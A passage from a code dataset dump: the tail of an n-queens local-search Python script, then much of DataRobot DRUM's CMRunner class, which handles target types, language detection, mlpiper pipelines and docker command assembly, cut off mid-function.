random.choice(list(range(0, size))))\n # print(\"random\")\n # modify_conflict_with_move(conflict, pos, max_x, random.choice(list(range(0, size))), size)\n # # return local_search(size, pos, conflict)\n # return sum_conflict(conflict)\n\n\ndef local_search_1(size, pos, sum_of_conflict, conflict=None):\n if conflict is None:\n conflict = cal_conflict(pos, size)\n\n # sum_of_conflict = sum_conflict(conflict)\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\", sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # x1 = sorted_conflict[0][0]\n x1 = 0\n x2 = 0\n modified = 0\n for begin_index in range(0, size-1):\n x1 = sorted_conflict[begin_index][0]\n # x2 = pos[x1]\n print(\"x1 :\", x1, end=\" \")\n for x_2 in sorted_conflict[begin_index+1:]:\n x2 = x_2[0]\n # print(\"begin swap\")\n modified = modify_conflict_with_swap(conflict, pos, x1, x2, size)\n new_conflict += modified\n # print(\"finish swap\")\n # print(sum_conflict(conflict))\n if new_conflict < sum_of_conflict:\n print(\"x2: \", x2)\n return new_conflict\n modified = modify_conflict_with_swap(conflict, pos, x1, x2, size)\n new_conflict += modified\n print(\"something bad\")\n modified = modify_conflict_with_swap(conflict, pos, x1, random.choice(range(0, size)), size)\n new_conflict += modified\n return new_conflict\n\n\ndef local_search_2(size, pos, sum_of_conflict, conflict=None):\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\", sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # x1 = sorted_conflict[0][0]\n x1 = 0\n x2 = 0\n modified = 0\n range_list = list(range(0, size))\n random.shuffle(range_list)\n for begin_index in range(0, size-1):\n x1 = sorted_conflict[begin_index][0]\n y1 = pos[x1]\n # x2 = pos[x1]\n print(\"x1 :\", x1, end=\" \")\n for new_y in range_list:\n modified = modify_conflict_with_move(conflict, pos, x1, new_y, size)\n new_conflict += modified\n if modified < 0:\n print(\"modified: \", modified, end=\" \")\n print(\"y: \", new_y)\n return new_conflict\n modified = modify_conflict_with_move(conflict, pos, x1, y1, size)\n new_conflict += modified\n print(\"something bad\")\n modified = modify_conflict_with_move(conflict, pos, x1, random.choice(range_list), size)\n new_conflict += modified\n return new_conflict\n\n\nprint(\"Initializing....\")\nconflict = dict()\ncal_conflict(pos, size, conflict)\nprint(\"Begin to iterate\")\ncnt = 0\nsum_of_conflict = sum_conflict(conflict)\nsum_of_conflict = local_search_1(size, pos, sum_of_conflict, conflict)\nwhile sum_of_conflict:\n cnt += 1\n sum_of_conflict = local_search_1(size, pos, sum_of_conflict, conflict)\n # print('')\n # draw_mat(pos, size)\nprint(sum_of_conflict)\ndraw_mat(pos, size)\nprint(\"cnt: \", cnt)\ncal_conflict(pos, size, conflict)\nprint(sum_conflict(conflict))","sub_path":"timetabling/timetabling/n_queen_localsearch.py","file_name":"n_queen_localsearch.py","file_ext":"py","file_size_in_byte":9535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"325107816","text":"import copy\nimport glob\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport time\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nfrom progress.spinner import Spinner\nfrom tempfile import mkdtemp, NamedTemporaryFile\n\nimport numpy as np\nimport pandas as pd\n\nfrom memory_profiler import memory_usage\nfrom mlpiper.pipeline.executor import Executor\nfrom mlpiper.pipeline.executor_config import ExecutorConfig\nfrom mlpiper.pipeline import json_fields\n\nfrom datarobot_drum.drum.common import (\n ArgumentsOptions,\n ArgumentOptionsEnvVars,\n CUSTOM_FILE_NAME,\n JavaArtifacts,\n JuliaArtifacts,\n LOG_LEVELS,\n LOGGER_NAME_PREFIX,\n PythonArtifacts,\n RArtifacts,\n RunLanguage,\n RunMode,\n TemplateType,\n TargetType,\n verbose_stdout,\n read_model_metadata_yaml,\n ModelMetadataKeys,\n get_metadata,\n)\nfrom datarobot_drum.drum.description import version as drum_version\nfrom datarobot_drum.drum.exceptions import DrumCommonException, DrumPredException\nfrom datarobot_drum.drum.perf_testing import CMRunTests\nfrom datarobot_drum.drum.push import drum_push, setup_validation_options\nfrom datarobot_drum.drum.templates_generator import CMTemplateGenerator\nfrom datarobot_drum.drum.typeschema_validation import SchemaValidator\nfrom datarobot_drum.drum.utils import (\n CMRunnerUtils,\n handle_missing_colnames,\n StructuredInputReadUtils,\n)\nfrom datarobot_drum.profiler.stats_collector import StatsCollector, StatsOperation\n\nimport docker.errors\n\nSERVER_PIPELINE = \"prediction_server_pipeline.json.j2\"\nPREDICTOR_PIPELINE = \"prediction_pipeline.json.j2\"\n\n\nclass CMRunner:\n def __init__(self, runtime):\n self.runtime = runtime\n self.options = runtime.options\n self.options.model_config = read_model_metadata_yaml(self.options.code_dir)\n self.logger = CMRunner._config_logger(runtime.options)\n self.verbose = runtime.options.verbose\n self.run_mode = RunMode(runtime.options.subparser_name)\n self.raw_arguments = sys.argv\n self.target_type = None\n\n self._resolve_target_type()\n self._resolve_class_labels()\n\n self._functional_pipelines = {\n (RunMode.FIT, RunLanguage.PYTHON): \"python_fit.json.j2\",\n (RunMode.FIT, RunLanguage.R): \"r_fit.json.j2\",\n }\n\n # require metadata for push mode\n if self.run_mode == RunMode.PUSH:\n get_metadata(self.options)\n\n if self.run_mode in [RunMode.FIT, RunMode.PUSH]:\n # always populate the validator, even if info isn't provided. Use the default type schema if no\n # schema is provided, strict validation is enabled, and the target type is transform\n type_schema = {}\n use_default_type_schema = False\n strict_validation = not self.options.disable_strict_validation\n if self.options.model_config:\n type_schema = self.options.model_config.get(\"typeSchema\", {})\n\n if not type_schema and strict_validation and self.target_type == TargetType.TRANSFORM:\n print(\n \"WARNING: No type schema provided. For transforms, we enforce using the default type schema to \"\n \"ensure there are no conflicts with other tasks downstream. Disable strict validation if you do \"\n \"not want to use the default type schema.\"\n )\n use_default_type_schema = True\n\n self.schema_validator = SchemaValidator(\n type_schema=type_schema,\n strict=strict_validation,\n use_default_type_schema=use_default_type_schema,\n verbose=self.verbose,\n )\n self._input_df = None\n\n @property\n def input_df(self):\n if self._input_df is None:\n # Lazy load df\n self._input_df = StructuredInputReadUtils.read_structured_input_file_as_df(\n self.options.input\n )\n return self._input_df\n\n def _resolve_target_type(self):\n if self.run_mode == RunMode.NEW:\n return\n\n target_type_options = getattr(self.options, \"target_type\", None)\n target_type_options = (\n None if target_type_options is None else TargetType(target_type_options)\n )\n target_type_model_config = None\n\n if self.options.model_config is not None:\n target_type_model_config = TargetType(self.options.model_config[\"targetType\"])\n\n if target_type_options is None and target_type_model_config is None:\n raise DrumCommonException(\n \"Target type is missing. It must be provided in --target-type argument, {} env var or model config file.\".format(\n ArgumentOptionsEnvVars.TARGET_TYPE\n )\n )\n elif (\n all([target_type_options, target_type_model_config])\n and target_type_options != target_type_model_config\n ):\n raise DrumCommonException(\n \"Target type provided in --target-type argument doesn't match target type from model config file. \"\n \"Use either one of them or make them match.\"\n )\n else:\n self.target_type = (\n target_type_options if target_type_options is not None else target_type_model_config\n )\n\n if self.target_type != TargetType.UNSTRUCTURED:\n if getattr(self.options, \"query\", None):\n raise DrumCommonException(\n \"--query argument can be used only with --target-type unstructured\"\n )\n if getattr(self.options, \"content_type\", None):\n raise DrumCommonException(\n \"--content-type argument can be used only with --target-type unstructured\"\n )\n else:\n if self.options.content_type is None:\n self.options.content_type = \"text/plain; charset=utf8\"\n\n def _resolve_class_labels(self):\n if self.run_mode in [RunMode.NEW] or (\n self.run_mode == RunMode.PUSH\n and self.options.model_config[ModelMetadataKeys.TYPE] == \"training\"\n ):\n self.options.positive_class_label = None\n self.options.negative_class_label = None\n self.options.class_labels = None\n self.options.class_labels_file = None\n return\n\n if self.target_type == TargetType.BINARY:\n pos_options = getattr(self.options, \"positive_class_label\", None)\n neg_options = getattr(self.options, \"negative_class_label\", None)\n\n try:\n pos_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"positiveClassLabel\")\n neg_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"negativeClassLabel\")\n except AttributeError:\n pos_model_config = neg_model_config = None\n\n if (\n not all([pos_options, neg_options])\n and not all([pos_model_config, neg_model_config])\n and self.run_mode != RunMode.FIT\n ):\n raise DrumCommonException(\n \"Positive/negative class labels are missing. They must be provided with either one: {}/{} arguments, environment variables, model config file.\".format(\n ArgumentsOptions.POSITIVE_CLASS_LABEL, ArgumentsOptions.NEGATIVE_CLASS_LABEL\n )\n )\n elif all([pos_options, neg_options, pos_model_config, neg_model_config]) and (\n pos_options != pos_model_config or neg_options != neg_model_config\n ):\n raise DrumCommonException(\n \"Positive/negative class labels provided with command arguments or environment variable don't match values from model config file. \"\n \"Use either one of them or make them match.\"\n )\n else:\n self.options.positive_class_label = (\n pos_options if pos_options is not None else pos_model_config\n )\n\n self.options.negative_class_label = (\n neg_options if neg_options is not None else neg_model_config\n )\n\n elif self.target_type == TargetType.MULTICLASS:\n labels_options = getattr(self.options, \"class_labels\", None)\n try:\n labels_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"classLabels\")\n except AttributeError:\n labels_model_config = None\n\n if (\n labels_options is None\n and labels_model_config is None\n and self.run_mode != RunMode.FIT\n ):\n raise DrumCommonException(\n \"Class labels are missing. They must be provided with either one: {}/{} arguments, environment variables, model config file.\".format(\n ArgumentsOptions.CLASS_LABELS, ArgumentsOptions.CLASS_LABELS_FILE\n )\n )\n # both not None but not set() equal\n elif all([labels_options, labels_model_config]) and set(labels_options) != set(\n labels_model_config\n ):\n raise DrumCommonException(\n \"Class labels provided with command arguments or environment variable don't match values from model config file. \"\n \"Use either one of them or make them match.\"\n )\n else:\n self.options.class_labels = (\n labels_options if labels_options is not None else labels_model_config\n )\n else:\n self.options.positive_class_label = None\n self.options.negative_class_label = None\n self.options.class_labels = None\n self.options.class_labels_file = None\n\n @staticmethod\n def _config_logger(options):\n logging.getLogger().setLevel(LOG_LEVELS[options.logging_level])\n logging.getLogger(\"werkzeug\").setLevel(LOG_LEVELS[options.logging_level])\n return logging.getLogger(LOGGER_NAME_PREFIX)\n\n def get_logger(self):\n return self.logger\n\n def _print_verbose(self, message):\n if self.verbose:\n print(message)\n\n def _print_welcome_header(self):\n mode_headers = {\n RunMode.SERVER: \"Detected REST server mode - this is an advanced option\",\n RunMode.SCORE: \"Detected score mode\",\n RunMode.PERF_TEST: \"Detected perf-test mode\",\n RunMode.VALIDATION: \"Detected validation check mode\",\n RunMode.FIT: \"Detected fit mode\",\n RunMode.NEW: \"Detected template generation mode\",\n RunMode.PUSH: \"Detected push mode\",\n }\n self._print_verbose(mode_headers[self.run_mode])\n\n def _check_artifacts_and_get_run_language(self):\n lang = getattr(self.options, \"language\", None)\n if lang:\n return RunLanguage(self.options.language)\n\n code_dir_abspath = os.path.abspath(self.options.code_dir)\n\n artifact_language = None\n custom_language = None\n # check which artifacts present in the code dir\n python_artifacts = CMRunnerUtils.find_files_by_extensions(\n code_dir_abspath, PythonArtifacts.ALL\n )\n r_artifacts = CMRunnerUtils.find_files_by_extensions(code_dir_abspath, RArtifacts.ALL)\n\n java_artifacts = CMRunnerUtils.find_files_by_extensions(code_dir_abspath, JavaArtifacts.ALL)\n\n julia_artifacts = CMRunnerUtils.find_files_by_extensions(\n code_dir_abspath, JuliaArtifacts.ALL\n )\n\n # check which custom code files present in the code dir\n is_custom_py = CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.py\")\n is_custom_r = CMRunnerUtils.filename_exists_and_is_file(\n code_dir_abspath, \"custom.R\"\n ) or CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.r\")\n is_custom_jl = CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.jl\")\n\n # if all the artifacts belong to the same language, set it\n if (\n bool(len(python_artifacts))\n + bool(len(r_artifacts))\n + bool(len(java_artifacts))\n + bool(len(julia_artifacts))\n == 1\n ):\n if len(python_artifacts) > 0:\n artifact_language = RunLanguage.PYTHON\n elif len(r_artifacts) > 0:\n artifact_language = RunLanguage.R\n elif len(java_artifacts) > 0:\n artifact_language = RunLanguage.JAVA\n elif len(julia_artifacts) > 0:\n artifact_language = RunLanguage.JULIA\n\n # if only one custom file found, set it:\n if is_custom_py + is_custom_r + is_custom_jl == 1:\n if is_custom_py:\n custom_language = RunLanguage.PYTHON\n elif is_custom_r:\n custom_language = RunLanguage.R\n else:\n custom_language = RunLanguage.JULIA\n\n # if both language values are None, or both are not None and not equal\n if (\n bool(custom_language) + bool(artifact_language) == 0\n or bool(custom_language) + bool(artifact_language) == 2\n and custom_language != artifact_language\n ):\n error_mes = (\n \"Can not detect language by artifacts and/or custom.py/R files.\\n\"\n \"Detected: language by artifacts - {}; language by custom - {}.\\n\"\n \"Code directory must have one or more model artifacts belonging to the same language:\\n\"\n \"Python/R/Java/Julia, with an extension:\\n\"\n \"Python models: {}\\n\"\n \"R models: {}\\n\"\n \"Java models: {}.\\n\"\n \"Julia models: {}.\\n\"\n \"Or one of custom.py/R files.\".format(\n \"None\" if artifact_language is None else artifact_language.value,\n \"None\" if custom_language is None else custom_language.value,\n PythonArtifacts.ALL,\n RArtifacts.ALL,\n JavaArtifacts.ALL,\n JuliaArtifacts.ALL,\n )\n )\n all_files_message = \"\\n\\nFiles(100 first) found in {}:\\n{}\\n\".format(\n code_dir_abspath, \"\\n\".join(sorted(os.listdir(code_dir_abspath))[0:100])\n )\n\n error_mes += all_files_message\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n run_language = custom_language if custom_language is not None else artifact_language\n self.options.language = run_language.value\n return run_language\n\n def _get_fit_run_language(self):\n def raise_no_language(custom_language):\n custom_language = \"None\" if custom_language is None else custom_language.value\n error_mes = (\n \"Can not detect language by custom.py/R/jl files.\\n\"\n \"Detected: language by custom - {}.\\n\"\n \"Code directory must have either a custom.py/R file\\n\"\n \"Or a python file using the drum_autofit() wrapper.\".format(custom_language,)\n )\n all_files_message = \"\\n\\nFiles(100 first) found in {}:\\n{}\\n\".format(\n code_dir_abspath, \"\\n\".join(sorted(os.listdir(code_dir_abspath))[0:100])\n )\n\n error_mes += all_files_message\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n def raise_multiple_custom_files(py_paths, r_paths, jl_paths):\n files_found = py_paths + r_paths + jl_paths\n error_mes = (\n \"Multiple custom.py/R/jl files were identified in the code directories sub directories.\\n\"\n \"If using the output directory option select a directory that does not contain additional \"\n \"output directories or code directories.\\n\\n\"\n \"The following custom model files were found:\\n\"\n )\n error_mes += \"\\n\".join([str(path) for path in files_found])\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n code_dir_abspath = os.path.abspath(self.options.code_dir)\n\n custom_language = None\n run_language = None\n is_py = False\n\n # check which custom code files present in the code dir\n custom_py_paths = list(Path(code_dir_abspath).rglob(\"{}.py\".format(CUSTOM_FILE_NAME)))\n custom_r_paths = list(Path(code_dir_abspath).rglob(\"{}.[rR]\".format(CUSTOM_FILE_NAME)))\n custom_jl_paths = list(Path(code_dir_abspath).rglob(\"{}.jl\".format(CUSTOM_FILE_NAME)))\n\n # subdirectories also contain custom py/R files, likely an incorrectly selected output dir.\n if len(custom_py_paths) + len(custom_r_paths) + len(custom_jl_paths) > 1:\n raise_multiple_custom_files(custom_py_paths, custom_r_paths, custom_jl_paths)\n # if only one custom file found, set it:\n elif len(custom_py_paths) == 1:\n custom_language = RunLanguage.PYTHON\n elif len(custom_r_paths) == 1:\n custom_language = RunLanguage.R\n elif len(custom_jl_paths) == 1:\n custom_language = RunLanguage.Julia\n # if no custom files, look for any other python file to use\n elif len(custom_py_paths) + len(custom_r_paths) == 0:\n\n other_py = list(Path(code_dir_abspath).rglob(\"*.py\"))\n\n other_r = list(Path(code_dir_abspath).rglob(\"*.r\")) + list(\n Path(code_dir_abspath).rglob(\"*.R\")\n )\n\n # if we find any py files and no R files set python, otherwise raise\n if len(other_py) > 0 and len(other_r) == 0:\n is_py = True\n else:\n raise_no_language(custom_language)\n\n # otherwise, we're in trouble\n else:\n raise_no_language(custom_language)\n\n if custom_language is not None:\n run_language = custom_language\n elif is_py:\n run_language = RunLanguage.PYTHON\n return run_language\n\n def run(self):\n try:\n if self.options.docker and (\n self.run_mode not in (RunMode.PUSH, RunMode.PERF_TEST, RunMode.VALIDATION)\n ):\n ret = self._run_inside_docker(self.options, self.run_mode, self.raw_arguments)\n if ret:\n raise DrumCommonException(\"Error from docker process: {}\".format(ret))\n return\n except DrumCommonException as e:\n self.logger.error(e)\n raise\n except AttributeError as e:\n # In some parser the options.docker does not exists\n if \"docker\" not in str(e):\n raise e\n\n self._print_welcome_header()\n\n if self.run_mode in [RunMode.SERVER, RunMode.SCORE]:\n self._run_fit_or_predictions_pipelines_in_mlpiper()\n elif self.run_mode == RunMode.FIT:\n self.run_fit()\n elif self.run_mode == RunMode.PERF_TEST:\n CMRunTests(self.options, self.run_mode).performance_test()\n elif self.run_mode == RunMode.VALIDATION:\n CMRunTests(self.options, self.run_mode, self.target_type).validation_test()\n elif self.run_mode == RunMode.NEW:\n self._generate_template()\n elif self.run_mode == RunMode.PUSH:\n options, run_mode, raw_arguments = setup_validation_options(copy.deepcopy(self.options))\n validation_runner = CMRunner(self.runtime)\n validation_runner.options = options\n validation_runner.run_mode = run_mode\n validation_runner.raw_arguments = raw_arguments\n validation_runner.run()\n print(\n \"Your model was successfully validated locally! Now we will add it into DataRobot\"\n )\n drum_push(self.options)\n else:\n error_message = \"{} mode is not implemented\".format(self.run_mode)\n print(error_message)\n raise DrumCommonException(error_message)\n\n def run_fit(self):\n input_data = self.input_df\n if self.options.target:\n input_data = input_data.drop(self.options.target, axis=1)\n self.schema_validator.validate_inputs(input_data)\n remove_temp_output = None\n if not self.options.output:\n self.options.output = mkdtemp()\n remove_temp_output = self.options.output\n mem_usage = memory_usage(\n self._run_fit_or_predictions_pipelines_in_mlpiper,\n interval=1,\n max_usage=True,\n max_iterations=1,\n )\n if self.options.verbose:\n print(\"Maximum fit memory usage: {}MB\".format(int(mem_usage)))\n if self.options.output or not self.options.skip_predict:\n create_custom_inference_model_folder(self.options.code_dir, self.options.output)\n if not self.options.skip_predict:\n mem_usage = memory_usage(\n self.run_test_predict, interval=1, max_usage=True, max_iterations=1,\n )\n if self.options.verbose:\n print(\"Maximum server memory usage: {}MB\".format(int(mem_usage)))\n pred_str = \" and predictions can be made on the fit model! \\n \"\n else:\n pred_str = \"however since you specified --skip-predict, predictions were not made \\n\"\n if remove_temp_output:\n print(\n \"Validation Complete 🎉 Your model can be fit to your data, {}\"\n \"You're ready to add it to DataRobot. \".format(pred_str)\n )\n shutil.rmtree(remove_temp_output)\n else:\n print(\"Success 🎉\")\n\n def run_test_predict(self):\n self.options.code_dir = self.options.output\n self.options.output = os.devnull\n __target_temp = None\n if self.options.target:\n __tempfile = NamedTemporaryFile()\n df = self.input_df\n if self.target_type == TargetType.TRANSFORM:\n target_df = df[self.options.target]\n __target_temp = NamedTemporaryFile()\n target_df.to_csv(__target_temp.name, index=False)\n df = df.drop(self.options.target, axis=1)\n # convert to R-friendly missing fields\n if self._get_fit_run_language() == RunLanguage.R:\n df = handle_missing_colnames(df)\n df.to_csv(__tempfile.name, index=False)\n self.options.input = __tempfile.name\n if self.target_type == TargetType.TRANSFORM:\n CMRunTests(\n self.options, self.run_mode, self.target_type, self.schema_validator\n ).check_transform_server(__target_temp)\n else:\n try:\n CMRunTests(\n self.options, self.run_mode, self.target_type, self.schema_validator\n ).check_prediction_side_effects()\n except DrumPredException as e:\n self.logger.warning(e)\n\n def _generate_template(self):\n CMTemplateGenerator(\n template_type=TemplateType.MODEL,\n language=RunLanguage(self.options.language),\n dir=self.options.code_dir,\n ).generate()\n\n def _prepare_prediction_server_or_batch_pipeline(self, run_language):\n options = self.options\n functional_pipeline_name = (\n SERVER_PIPELINE if self.run_mode == RunMode.SERVER else PREDICTOR_PIPELINE\n )\n functional_pipeline_filepath = CMRunnerUtils.get_pipeline_filepath(functional_pipeline_name)\n # fields to replace in the pipeline\n replace_data = {\n \"positiveClassLabel\": options.positive_class_label,\n \"negativeClassLabel\": options.negative_class_label,\n \"classLabels\": options.class_labels,\n \"customModelPath\": os.path.abspath(options.code_dir),\n \"run_language\": run_language.value,\n \"monitor\": options.monitor,\n \"model_id\": options.model_id,\n \"deployment_id\": options.deployment_id,\n \"monitor_settings\": options.monitor_settings,\n \"query_params\": '\"{}\"'.format(options.query)\n if getattr(options, \"query\", None) is not None\n else \"null\",\n \"content_type\": '\"{}\"'.format(options.content_type)\n if getattr(options, \"content_type\", None) is not None\n else \"null\",\n \"target_type\": self.target_type.value,\n }\n\n if self.run_mode == RunMode.SCORE:\n replace_data.update(\n {\n \"input_filename\": options.input,\n \"output_filename\": '\"{}\"'.format(options.output) if options.output else \"null\",\n }\n )\n else:\n host_port_list = options.address.split(\":\", 1)\n host = host_port_list[0]\n port = int(host_port_list[1]) if len(host_port_list) == 2 else None\n replace_data.update(\n {\n \"host\": host,\n \"port\": port,\n \"show_perf\": str(options.show_perf).lower(),\n \"engine_type\": \"RestModelServing\" if options.production else \"Generic\",\n \"component_type\": \"uwsgi_serving\"\n if options.production\n else \"prediction_server\",\n \"uwsgi_max_workers\": options.max_workers\n if getattr(options, \"max_workers\")\n else \"null\",\n \"single_uwsgi_worker\": (options.max_workers == 1),\n \"deployment_config\": '\"{}\"'.format(options.deployment_config)\n if getattr(options, \"deployment_config\", None) is not None\n else \"null\",\n }\n )\n\n functional_pipeline_str = CMRunnerUtils.render_file(\n functional_pipeline_filepath, replace_data\n )\n\n if self.run_mode == RunMode.SERVER:\n if options.production:\n pipeline_json = json.loads(functional_pipeline_str)\n # Because of tech debt in MLPiper which requires that the modelFileSourcePath key\n # be filled with something, we're putting in a dummy file path here\n if json_fields.PIPELINE_SYSTEM_CONFIG_FIELD not in pipeline_json:\n system_config = {\"modelFileSourcePath\": os.path.abspath(__file__)}\n pipeline_json[json_fields.PIPELINE_SYSTEM_CONFIG_FIELD] = system_config\n functional_pipeline_str = json.dumps(pipeline_json)\n return functional_pipeline_str\n\n def _prepare_fit_pipeline(self, run_language):\n\n if self.target_type.value in TargetType.CLASSIFICATION.value and (\n self.options.negative_class_label is None or self.options.class_labels is None\n ):\n # No class label information was supplied, but we may be able to infer the labels\n possible_class_labels = possibly_intuit_order(\n self.options.input,\n self.options.target_csv,\n self.options.target,\n self.target_type == TargetType.ANOMALY,\n )\n if possible_class_labels is not None:\n if self.target_type == TargetType.BINARY:\n if len(possible_class_labels) != 2:\n raise DrumCommonException(\n \"Target type {} requires exactly 2 class labels. Detected {}: {}\".format(\n TargetType.BINARY, len(possible_class_labels), possible_class_labels\n )\n )\n (\n self.options.positive_class_label,\n self.options.negative_class_label,\n ) = possible_class_labels\n elif self.target_type == TargetType.MULTICLASS:\n if len(possible_class_labels) < 2:\n raise DrumCommonException(\n \"Target type {} requires more than 2 class labels. Detected {}: {}\".format(\n TargetType.MULTICLASS,\n len(possible_class_labels),\n possible_class_labels,\n )\n )\n self.options.class_labels = list(possible_class_labels)\n else:\n raise DrumCommonException(\n \"Target type {} requires class label information. No labels were supplied and \"\n \"labels could not be inferred from the target.\".format(self.target_type.value)\n )\n\n options = self.options\n # functional pipeline is predictor pipeline\n # they are a little different for batch and server predictions.\n functional_pipeline_name = self._functional_pipelines[(self.run_mode, run_language)]\n functional_pipeline_filepath = CMRunnerUtils.get_pipeline_filepath(functional_pipeline_name)\n # fields to replace in the functional pipeline (predictor)\n replace_data = {\n \"customModelPath\": os.path.abspath(options.code_dir),\n \"input_filename\": options.input,\n \"weights\": options.row_weights,\n \"weights_filename\": options.row_weights_csv,\n \"target_column\": options.target,\n \"target_filename\": options.target_csv,\n \"positiveClassLabel\": options.positive_class_label,\n \"negativeClassLabel\": options.negative_class_label,\n \"classLabels\": options.class_labels,\n \"output_dir\": options.output,\n \"num_rows\": options.num_rows,\n \"sparse_column_file\": options.sparse_column_file,\n \"parameter_file\": options.parameter_file,\n }\n\n functional_pipeline_str = CMRunnerUtils.render_file(\n functional_pipeline_filepath, replace_data\n )\n return functional_pipeline_str\n\n def _run_fit_or_predictions_pipelines_in_mlpiper(self):\n if self.run_mode == RunMode.SERVER:\n run_language = self._check_artifacts_and_get_run_language()\n # in prediction server mode infra pipeline == prediction server runner pipeline\n infra_pipeline_str = self._prepare_prediction_server_or_batch_pipeline(run_language)\n elif self.run_mode == RunMode.SCORE:\n run_language = self._check_artifacts_and_get_run_language()\n tmp_output_filename = None\n # if output is not provided, output into tmp file and print\n if not self.options.output:\n # keep object reference so it will be destroyed only in the end of the process\n __tmp_output_file = tempfile.NamedTemporaryFile(mode=\"w\")\n self.options.output = tmp_output_filename = __tmp_output_file.name\n # in batch prediction mode infra pipeline == predictor pipeline\n infra_pipeline_str = self._prepare_prediction_server_or_batch_pipeline(run_language)\n elif self.run_mode == RunMode.FIT:\n run_language = self._get_fit_run_language()\n infra_pipeline_str = self._prepare_fit_pipeline(run_language)\n else:\n error_message = \"{} mode is not supported here\".format(self.run_mode)\n print(error_message)\n raise DrumCommonException(error_message)\n\n config = ExecutorConfig(\n pipeline=infra_pipeline_str,\n pipeline_file=None,\n run_locally=True,\n comp_root_path=CMRunnerUtils.get_components_repo(),\n mlpiper_jar=None,\n spark_jars=None,\n )\n\n _pipeline_executor = Executor(config).standalone(True).set_verbose(self.options.verbose)\n # assign logger with the name drum.mlpiper.Executor to mlpiper Executor\n _pipeline_executor.set_logger(\n logging.getLogger(LOGGER_NAME_PREFIX + \".\" + _pipeline_executor.logger_name())\n )\n\n self.logger.info(\n \">>> Start {} in the {} mode\".format(ArgumentsOptions.MAIN_COMMAND, self.run_mode.value)\n )\n sc = StatsCollector(\n disable_instance=(\n not hasattr(self.options, \"show_perf\")\n or not self.options.show_perf\n or self.run_mode == RunMode.SERVER\n )\n )\n sc.register_report(\"Full time\", \"end\", StatsOperation.SUB, \"start\")\n sc.register_report(\"Init time (incl model loading)\", \"init\", StatsOperation.SUB, \"start\")\n sc.register_report(\"Run time (incl reading CSV)\", \"run\", StatsOperation.SUB, \"init\")\n with verbose_stdout(self.options.verbose):\n sc.enable()\n try:\n sc.mark(\"start\")\n\n _pipeline_executor.init_pipeline()\n self.runtime.initialization_succeeded = True\n sc.mark(\"init\")\n\n _pipeline_executor.run_pipeline(cleanup=False)\n sc.mark(\"run\")\n finally:\n _pipeline_executor.cleanup_pipeline()\n sc.mark(\"end\")\n sc.disable()\n self.logger.info(\n \"<<< Finish {} in the {} mode\".format(\n ArgumentsOptions.MAIN_COMMAND, self.run_mode.value\n )\n )\n sc.print_reports()\n if self.run_mode == RunMode.SCORE:\n # print result if output is not provided\n if tmp_output_filename:\n if self.target_type == TargetType.UNSTRUCTURED:\n with open(tmp_output_filename) as f:\n print(f.read())\n else:\n print(pd.read_csv(tmp_output_filename))\n\n def _prepare_docker_command(self, options, run_mode, raw_arguments):\n \"\"\"\n Building a docker command line for running the model inside the docker - this command line\n can be used by the user independently of drum.\n Parameters\n Returns: docker command line to run as a string\n \"\"\"\n options.docker = self._maybe_build_image(options.docker)\n in_docker_model = \"/opt/model\"\n in_docker_input_file = \"/opt/input.csv\"\n in_docker_output_file = \"/opt/output.csv\"\n in_docker_fit_output_dir = \"/opt/fit_output_dir\"\n in_docker_fit_target_filename = \"/opt/fit_target.csv\"\n in_docker_fit_row_weights_filename = \"/opt/fit_row_weights.csv\"\n\n docker_cmd = \"docker run --rm --entrypoint '' --interactive --user $(id -u):$(id -g)\"\n docker_cmd_args = ' -v \"{}\":{}'.format(options.code_dir, in_docker_model)\n\n in_docker_cmd_list = raw_arguments\n in_docker_cmd_list[0] = ArgumentsOptions.MAIN_COMMAND\n in_docker_cmd_list[1] = run_mode.value\n\n # [RAPTOR-5607] Using -cd makes fit fail within docker, but not --code-dir.\n # Hotfix it by replacing -cd with --code-dir\n in_docker_cmd_list = [\n ArgumentsOptions.CODE_DIR if arg == \"-cd\" else arg for arg in in_docker_cmd_list\n ]\n\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.DOCKER)\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.SKIP_DEPS_INSTALL)\n if options.memory:\n docker_cmd_args += \" --memory {mem_size} --memory-swap {mem_size} \".format(\n mem_size=options.memory\n )\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.MEMORY)\n\n if options.class_labels and ArgumentsOptions.CLASS_LABELS not in in_docker_cmd_list:\n CMRunnerUtils.delete_cmd_argument(\n in_docker_cmd_list, ArgumentsOptions.CLASS_LABELS_FILE\n )\n in_docker_cmd_list.append(ArgumentsOptions.CLASS_LABELS)\n for label in options.class_labels:\n in_docker_cmd_list.append(label)\n\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.CODE_DIR, in_docker_model\n )\n CMRunnerUtils.replace_cmd_argument_value(in_docker_cmd_list, \"-cd\", in_docker_model)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.INPUT, in_docker_input_file\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_output_file\n )\n\n if run_mode == RunMode.SERVER:\n host_port_list = options.address.split(\":\", 1)\n if len(host_port_list) == 1:\n raise DrumCommonException(\n \"Error: when using the docker option provide argument --server host:port\"\n )\n port 